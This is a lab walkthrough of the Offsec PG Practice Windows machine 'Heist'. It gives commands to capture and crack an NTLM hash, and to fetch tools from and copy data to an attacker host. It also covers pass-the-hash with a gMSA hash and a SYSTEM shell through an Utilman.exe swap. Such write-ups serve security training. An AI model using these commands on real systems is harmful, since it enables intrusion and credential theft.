Heist Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)

---

Scanning

Quick scanning all the ports and services.

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2025-10-11 10:35:35Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-10-11T10:37:12+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Issuer: commonName=DC01.heist.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-10T10:31:25
| Not valid after:  2026-04-11T10:31:25
| MD5:   09da:79ee:6601:19c9:baa4:7144:1555:accf
| SHA-1: 74ed:e34c:2842:7cb9:1a25:7a71:51df:e967:d259:97c2
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQSyvebt6EYItF+jWSggdRkTANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFEQzAxLmhlaXN0Lm9mZnNlYzAeFw0yNTEwMTAxMDMxMjVaFw0y
| NjA0MTExMDMxMjVaMBwxGjAYBgNVBAMTEURDMDEuaGVpc3Qub2Zmc2VjMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0430MQvIQF4sR8VJIX5WOkrMskx
| ozIZmQwqrJo6G5+0BLOuDGjcTnT7zn5trbMBu4UuZQ40LGYB33/NtqhMaTJi1YGb
| S30wcWXTvjZHSrhnaDZHrmS+US5hcDAAGsicfqX1GOYaNnFc25MJH4vqu7C+Zehc
| v7njEdHJSacraEEPXoMoie/ATMkpwLuHxMvU8Bn0NkYb0ag+ct6rVOaN3pFL0j+d
| 5o+j5WOFlvvxRP0j0rjkXYuMY34NoZonYWJjNqJmuMEeVfOHLjBHvoxROeW7RIOC
| +Nt5TOrVNO9h5suiG/LCLPIrOccFl0eAH9w76SjYi3dduBaN44mfVj4qLQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBADcnPkKu9op58vqtW2AiQJ5hWfEzVXL1PszskXl3U1jNF9KPKqBC
| 9Hcow41A0QqqupHxuCWM2G4VHAfPYTU8ozlYiWfz+acC5JceuPUR++SR+qulz92y
| P0kcrbSmjZXnSyr6gzGhorffIBaYKwGMrtCbKEsRLs3F5ntJk6gGkfXA+ScHL+O2
| J6revEAG/hhZlfCBbImz9aJ1oQ3TEsqBeT/V1IcAWvMKkpvmdYbv5GTBZ7FccURY
| Z2QhHHfEWQpuIOftQMHcvZsLakRLCb1SYGXbRbJCWO1Juqm94CD4j/v3QSbHIWBs
| 9DX+B6nzbGiE9SiMkWYWmJZpP8BAZzuNVFg=
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http          syn-ack ttl 125 Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49704/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49759/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 37836/tcp): CLEAN (Timeout)
|   Check 2 (port 20781/tcp): CLEAN (Timeout)
|   Check 3 (port 32412/udp): CLEAN (Timeout)
|   Check 4 (port 58212/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-10-11T10:36:33
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Deduction from the above scanning

**Domain name ** : heist.offsec we see that 3389 is open so RDP is possible

We will start our enumeartion with HTTP first as always and then we will move to something else.

Enumeration

HTTP 8080

Going to the website it shows

So I used webserver using python and used the link in the website.

sudo python3 -m http.server 80

so I started responder

$ sudo responder -I tun0 -A 

And created a request from the browser.

So now we have NTLM let's crack it using johntheripper.

john --wordlist=/usr/share/wordlists/rockyou.txt enox.hash 

now we have a password california .

---

Initial Access

crackmapexec winrm 192.168.178.165 -u enox -p california --continue-on-success

evil-winrm -i 192.168.178.165 -u enox -p california  

---

Post Exploitation Enumeartion

Download and execute sharphound

so I know this is a domain machine and so I downloaded sharphound in it, and executed it to collect all of it.

*Evil-WinRM* PS C:\Users\enox> iwr -uri http://192.168.45.170/SharpHound.exe -Outfile sharphound.exe
*Evil-WinRM* PS C:\Users\enox> .\sharphound.exe -c All 

Get the sharphound result in kali

Start smbserver in kali machine

┌──(kali㉿kali)-[~/Documents/offsec/pg_practice/heist]
└─$ mkdir tools                                                                                      
                                                                                                                                                                                         
┌──(kali㉿kali)-[~/Documents/offsec/pg_practice/heist]
└─$ impacket-smbserver -smb2support smb tools/

copy it from the windows machine

*Evil-WinRM* PS C:\Users\enox> copy .\20251011060753_BloodHound.zip \\192.168.45.170\smb\20251011060753_BloodHound.zip

BloodHound review

While going through the results in bloodhound I found something in Oubound Object control.

ReadGMSAPassword , And this felt interesting. Upon clicking on the node I got information about it.

It also shows the command that can be used to get the hash.

So I downloaded the ReadGMSAPassword.exe and downloaded it.

*Evil-WinRM* PS C:\Users\enox> .\gmsapassreader.exe --accountname "svc_apache"

!! Now we have the hashes !!

Lateral Movement

Using the hash from the above command into the evil-winrm to get access to the svc_apache user.

$ evil-winrm -i 192.168.178.165 -u 'svc_apache$' -H D871B9AF745F0F6B0EB97F368E81B684

Searching a little I found a github with all the excalation methods.

Privilege Escalation

With the given steps to escalate privilege

Step 1. Download and execute the Enable-SeRestorePrivilege.ps1

Downloading from my kali machine

iwr -uri http://192.168.45.170/EnableSeRestorePrivilege.ps1 -Ouftile EnableSeRestorePrivilege.ps1

Bypassing execution permission and then execute it.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> powershell -ep bypass
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> .\EnableSeRestorePrivilege.ps1

Step 2. Rename the Utilman.exe to old_Utilman.exe and make cmd.exe as Utilman.exe

*Evil-WinRM* PS C:\Windows\system32> ren Utilman.exe old_Utilman.exe
*Evil-WinRM* PS C:\Windows\system32> ren cmd.exe Utilman.exe

Step 3. Try to login through the rdp session.

└─$ xfreerdp3 /u:enox /p:'california' /v:192.168.178.165 /timeout:6000 /d:heist.offsec /cert:ignore /sec:tls

now you won't be able to login but when you press win+u instead of Utilman cmd.exe will open as system.

---